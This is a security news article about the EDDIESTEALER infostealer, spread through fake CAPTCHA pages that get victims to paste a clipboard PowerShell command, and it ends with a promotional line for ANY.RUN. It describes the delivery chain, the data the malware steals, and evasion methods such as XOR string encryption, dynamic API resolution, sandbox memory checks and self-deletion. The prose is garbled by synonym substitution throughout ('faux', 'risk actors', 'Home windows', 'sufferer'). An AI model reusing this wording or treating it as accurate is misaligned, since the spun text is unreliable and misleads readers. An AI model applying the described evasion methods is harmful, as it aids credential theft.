Cybersecurity researchers have uncovered a complicated malware marketing campaign leveraging misleading CAPTCHA verification pages to distribute a newly found Rust-based infostealer dubbed EDDIESTEALER.
This marketing campaign represents a big evolution in social engineering techniques, the place risk actors exploit customers’ familiarity with routine safety verification processes to trick them into executing malicious code.
The malware employs an intricate multi-stage supply mechanism that begins with compromised web sites displaying convincing faux “I’m not a robotic” verification screens, finally resulting in the deployment of a strong data-stealing software able to harvesting credentials, browser info, and cryptocurrency pockets particulars.
The assault vector demonstrates outstanding sophistication in its execution methodology. Preliminary entry happens by compromised web sites that deploy obfuscated React-based JavaScript payloads, presenting customers with what seems to be a authentic Google reCAPTCHA verification interface.
These faux verification screens instruct customers to carry out seemingly innocuous actions: urgent Home windows Key + R to open the Run dialog, adopted by Ctrl + V to stick clipboard contents, and eventually Enter to execute the command.
Unbeknownst to the sufferer, the malicious JavaScript has already copied a PowerShell command to their clipboard utilizing the doc.execCommand(“copy”) methodology.
Elastic Safety Labs analysts recognized this rising risk by complete telemetry evaluation, discovering that the marketing campaign leverages a complicated command construction that silently downloads secondary payloads from attacker-controlled infrastructure.
The PowerShell command mechanically retrieves a JavaScript file named “gverify.js” from domains akin to hxxps://1111.match/model/, which subsequently downloads the primary EDDIESTEALER executable with a pseudorandomly generated 12-character filename.
This multi-layered strategy successfully obscures the true nature of the assault whereas sustaining the looks of authentic system verification processes.
Faux CAPTCHA GUI (Supply – Elastic)
The malware’s impression extends far past easy credential theft, focusing on a complete vary of delicate knowledge together with cryptocurrency wallets, browser saved credentials, password supervisor databases, FTP consumer configurations, and messaging functions.
EDDIESTEALER demonstrates specific sophistication in its strategy to trendy browser safety, implementing strategies much like ChromeKatz to bypass Software-bound encryption protections launched in current Chrome variations.
EDDIESTEALER’s execution chain (Supply – Elastic)
The malware’s capability to adapt to evolving safety measures highlights the persistent risk posed by well-resourced cybercriminal organizations.
Superior Evasion and Persistence Mechanisms
EDDIESTEALER employs a number of layers of obfuscation and evasion strategies that distinguish it from typical infostealers.
The malware makes use of intensive string encryption by XOR ciphers, with every decryption routine using distinct key derivation features that settle for binary addresses and 4-byte constants to calculate XOR key places.
This strategy considerably complicates static evaluation efforts, as researchers should reverse-engineer a number of customized decryption algorithms to extract significant artifacts.
The malware implements refined API obfuscation by a customized Home windows API lookup mechanism. Somewhat than counting on customary import tables, EDDIESTEALER dynamically resolves perform addresses by sustaining an area hashtable of beforehand resolved API calls.
When a brand new perform is required, the malware employs customized LoadLibrary and GetProcAddress implementations to retrieve addresses, subsequently caching them for future use.
This system successfully evades signature-based detection methods that depend on import desk evaluation.
EDDIESTEALER incorporates a number of anti-analysis options, together with memory-based sandbox detection that evaluates complete bodily reminiscence to find out if the system meets minimal necessities of roughly 4.0 GB.
Moreover, newer variants counsel server-side profiling capabilities, the place the command and management infrastructure can assess consumer environments and withhold malicious payloads when sandbox or evaluation methods are detected.
The malware additionally implements self-deletion capabilities utilizing NTFS Alternate Information Streams renaming strategies, much like these noticed in LATRODECTUS campaigns, enabling the executable to take away itself from disk whereas bypassing file lock restrictions.
Rejoice 9 years of ANY.RUN! Unlock the complete energy of TI Lookup plan (100/300/600/1,000+ search requests), and your request quota will double.
